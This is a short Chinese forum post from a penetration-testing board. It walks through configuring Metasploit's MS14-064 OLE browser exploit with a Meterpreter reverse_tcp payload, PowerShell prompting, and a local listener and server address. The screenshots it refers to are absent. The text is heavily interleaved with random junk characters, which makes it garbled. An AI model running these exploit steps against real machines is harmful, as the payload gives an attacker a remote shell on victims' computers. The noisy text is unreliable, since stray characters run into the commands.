: A+ |! X. S n# n 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
9 S8 Y* y' U5 A3 }8 k. v3 Y4 W, b- ]: x% R6 p1 V: n
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( D* B, x( s' n( M3 s5 G
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp5 g& i2 t: L* t$ ]# y
F+ r0 E: T% W. }3 P& l2 p# @8 T3 D/ G2 b. P/ u# q set AllowPowershellPrompt true: g9 d c% Y( a2 j& o
2 \" Q! G4 i: y4 X3 S% oSet LHOST 192.168.0.109
9 I9 I# f) ]6 Z9 X, X2 {/ Q! ]$ r5 h. o& D; O set SRVHOST 192.168.0.109
Set uripath share
* s% S" {1 y0 v; E ]8 F; K9 g( M2 _# _" a6 b2 ` Set srvport 80
. c8 e: N9 \! L- C
% h7 b2 E' }4 Z& b 3 `8 `& w L5 w
7 I" x; {4 J! r) K8 X$ {% X! e8 z1 z* ]8 Z6 _) u8 F0 z1 P # w% u) V/ N- A! L+ p: L
) e6 J& `" ]* s* P
- R* `4 ]6 [0 O' l# i6 X% U) u6 X8 h* B; h7 B. j: B5 z2 _ 下面我们来访问本地地址如图:6 c9 |, o/ P' ~, o
# L. g/ Z; z: K b5 X# h: R1 t& v8 v, i( m6 t $ i2 k, ]( R5 d$ S
/ o; E2 S" h: X# ~ - T0 R4 j9 a3 q. ]7 n+ I
: A+ m4 e' _3 y0 M7 f" D$ h% d2 Q; b; D Q% O
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |